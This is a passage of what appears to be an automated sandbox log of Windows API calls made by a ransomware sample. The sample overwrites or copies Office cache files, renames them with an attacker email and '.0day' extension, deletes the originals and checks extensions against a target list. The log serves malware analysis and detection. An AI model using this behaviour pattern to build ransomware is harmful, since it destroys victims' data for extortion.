0x2020 [0042.565] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0042.565] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0042.566] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0042.566] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0042.566] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.566] ReadFile (in: hFile=0x1a8, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.570] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.570] ReadFile (in: hFile=0x1a8, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.573] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0042.573] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0042.573] ReadFile (in: hFile=0x1a8, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0042.677] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.677] WriteFile (in: hFile=0x1a8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0042.969] SetEndOfFile (hFile=0x1a8) returned 1 [0042.969] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x400a0d8 [0042.972] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.972] WriteFile (in: hFile=0x1a8, lpBuffer=0x400a0d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a0d8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.973] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x14d4b5, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.973] WriteFile (in: hFile=0x1a8, lpBuffer=0x400a0d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a0d8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.975] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x3a7e1f, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0042.975] WriteFile (in: hFile=0x1a8, lpBuffer=0x400a0d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x400a0d8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0042.978] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x400a0d8 | out: hHeap=0x5f0000) returned 1 [0042.978] CloseHandle (hObject=0x1a8) returned 1 [0042.978] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.978] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.978] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.978] lstrlenW (lpString=".doc") returned 4 [0042.978] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.978] lstrlenW (lpString=".docx") returned 5 [0042.978] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.978] lstrlenW (lpString=".pdf") returned 4 [0042.978] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.978] lstrlenW (lpString=".xls") returned 4 [0042.979] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString=".xlsx") returned 5 [0042.979] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.979] lstrlenW (lpString=".ppt") returned 4 [0042.979] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString=".zip") returned 4 [0042.979] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString=".rar") returned 4 [0042.979] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString=".bz2") returned 4 [0042.979] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.979] lstrlenW (lpString=".7z") returned 3 [0042.979] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString=".dbf") returned 4 [0042.979] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString=".1cd") returned 4 [0042.979] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString=".jpg") returned 4 [0042.979] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.979] lstrlenW (lpString=".doc") returned 4 [0042.979] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString=".docx") returned 5 [0042.979] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.979] lstrlenW (lpString=".pdf") returned 4 [0042.979] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.979] lstrlenW (lpString=".xls") returned 4 [0042.980] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.980] lstrlenW (lpString=".xlsx") returned 5 [0042.980] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.980] lstrlenW (lpString=".ppt") returned 4 [0042.980] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.980] lstrlenW (lpString=".zip") returned 4 [0042.980] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.980] lstrlenW (lpString=".rar") returned 4 [0042.980] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.980] lstrlenW (lpString=".bz2") returned 4 [0042.980] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.980] lstrlenW (lpString=".7z") returned 3 [0042.980] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.980] lstrlenW (lpString=".dbf") returned 4 [0042.980] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.980] lstrlenW (lpString=".1cd") returned 4 [0042.980] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.980] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 75 [0042.980] lstrlenW (lpString=".jpg") returned 4 [0042.980] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.980] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0042.980] lstrlenW (lpString="dwtrig20.exe") returned 12 [0042.980] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0043.418] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=519584) returned 1 [0043.418] CloseHandle (hObject=0x1c4) returned 1 [0043.418] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 0x2020 [0043.418] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.418] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0043.418] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.418] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.418] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0043.418] GetLastError () returned 0x0 [0043.418] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x7eda0, lpOverlapped=0x0) returned 1 [0043.432] WriteFile (in: hFile=0x1fc, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x7edb0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x7edb0, lpOverlapped=0x0) returned 1 [0043.440] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.440] WriteFile (in: hFile=0x1fc, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.440] SetEndOfFile (hFile=0x1fc) returned 1 [0043.440] CloseHandle (hObject=0x1fc) returned 1 [0043.440] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.440] SetEndOfFile (hFile=0x1c4) returned 1 [0043.620] CloseHandle (hObject=0x1c4) returned 1 [0043.620] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0043.620] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe")) returned 1 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString=".doc") returned 4 [0043.621] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0043.621] lstrlenW (lpString=".docx") returned 5 [0043.621] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0043.621] lstrlenW (lpString=".pdf") returned 4 [0043.621] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0043.621] lstrlenW (lpString=".xls") returned 4 [0043.621] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0043.621] lstrlenW (lpString=".xlsx") returned 5 [0043.621] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0043.621] lstrlenW (lpString=".ppt") returned 4 [0043.621] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString=".zip") returned 4 [0043.621] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0043.621] lstrlenW (lpString=".rar") returned 4 [0043.621] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0043.621] lstrlenW (lpString=".bz2") returned 4 [0043.621] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0043.621] lstrlenW (lpString=".7z") returned 3 [0043.621] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString=".dbf") returned 4 [0043.621] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString=".1cd") returned 4 [0043.621] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0043.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.621] lstrlenW (lpString=".jpg") returned 4 [0043.621] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString=".doc") returned 4 [0043.622] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0043.622] lstrlenW (lpString=".docx") returned 5 [0043.622] lstrcmpiW (lpString1=".docx", lpString2="0.exe") returned -1 [0043.622] lstrlenW (lpString=".pdf") returned 4 [0043.622] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString=".xls") returned 4 [0043.622] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString=".xlsx") returned 5 [0043.622] lstrcmpiW (lpString1=".xlsx", lpString2="0.exe") returned -1 [0043.622] lstrlenW (lpString=".ppt") returned 4 [0043.622] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString=".zip") returned 4 [0043.622] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString=".rar") returned 4 [0043.622] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0043.622] lstrlenW (lpString=".bz2") returned 4 [0043.622] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0043.622] lstrlenW (lpString=".7z") returned 3 [0043.622] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString=".dbf") returned 4 [0043.622] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString=".1cd") returned 4 [0043.622] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0043.622] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0043.622] lstrlenW (lpString=".jpg") returned 4 [0043.622] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0043.623] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0043.623] lstrlenW (lpString="OfficeMUISet.msi") returned 16 [0043.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0043.623] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=868864) returned 1 [0043.623] CloseHandle (hObject=0x1c4) returned 1 [0043.623] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 0x2020 [0043.623] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0043.623] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.623] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.623] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.624] GetLastError () returned 0x0 [0043.624] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0043.640] WriteFile (in: hFile=0x198, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0043.656] ReadFile (in: hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.656] WriteFile (in: hFile=0x198, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0043.656] SetEndOfFile (hFile=0x198) returned 1 [0043.656] CloseHandle (hObject=0x198) returned 1 [0043.656] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.656] SetEndOfFile (hFile=0x1c4) returned 1 [0044.076] CloseHandle (hObject=0x1c4) returned 1 [0044.082] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0044.083] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi")) returned 1 [0044.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.286] lstrlenW (lpString=".doc") returned 4 [0044.286] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.286] lstrlenW (lpString=".docx") returned 5 [0044.286] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.286] lstrlenW (lpString=".pdf") returned 4 [0044.286] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.286] lstrlenW (lpString=".xls") returned 4 [0044.286] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.286] lstrlenW (lpString=".xlsx") returned 5 [0044.286] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.286] lstrlenW (lpString=".ppt") returned 4 [0044.286] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0044.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.286] lstrlenW (lpString=".zip") returned 4 [0044.286] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0044.286] lstrlenW (lpString=".rar") returned 4 [0044.286] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0044.286] lstrlenW (lpString=".bz2") returned 4 [0044.286] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0044.286] lstrlenW (lpString=".7z") returned 3 [0044.286] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0044.286] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.286] lstrlenW (lpString=".dbf") returned 4 [0044.286] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString=".1cd") returned 4 [0044.287] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString=".jpg") returned 4 [0044.287] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 79 [0044.287] lstrlenW (lpString=".doc") returned 4 [0044.287] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0044.287] lstrlenW (lpString=".docx") returned 5 [0044.287] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0044.287] lstrlenW (lpString=".pdf") returned 4 [0044.287] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0044.287] lstrlenW (lpString=".xls") returned 4 [0044.287] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0044.287] lstrlenW (lpString=".xlsx") returned 5 [0044.287] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0044.287] lstrlenW (lpString=".ppt") returned 4 [0044.287] lstrcmpiW (lpString1=".ppt", 